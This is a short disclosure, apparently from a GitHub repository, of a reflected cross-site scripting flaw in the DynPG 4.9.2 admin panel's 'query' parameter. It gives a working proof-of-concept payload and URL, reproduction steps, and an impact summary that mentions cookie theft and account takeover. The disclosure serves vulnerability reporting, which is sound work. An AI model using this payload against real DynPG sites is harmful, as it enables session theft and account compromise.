Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
Description
A cross-site scripting (XSS) issue in the DynPG admin login panel version 4.9.2 allows remote attackers to inject JavaScript via the "query" Parameter
___
XSS Payload: x"%20onmouseover=alert(4)%20x="
___
Vulnerable Parameter: query
___
Steps to Reproduce the Issue:
1- Login to DynPG admin panel
2- Paste below POC:
https://localhost/dynpg/backendpopup/popup.php?limit=&orderby=&page=&popUpResource=texts&query=x"%20onmouseover=alert(4)%20x="&refID=&returnCall=&sort=&valueID=
(hover your mouse to “x” to trigger XSS)
Video POC: https://drive.google.com/file/d/1KY8ZLiD5SbjrgpRjmR0D5-iZIcNu-JDN/view?usp=sharing
___
Impact
With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.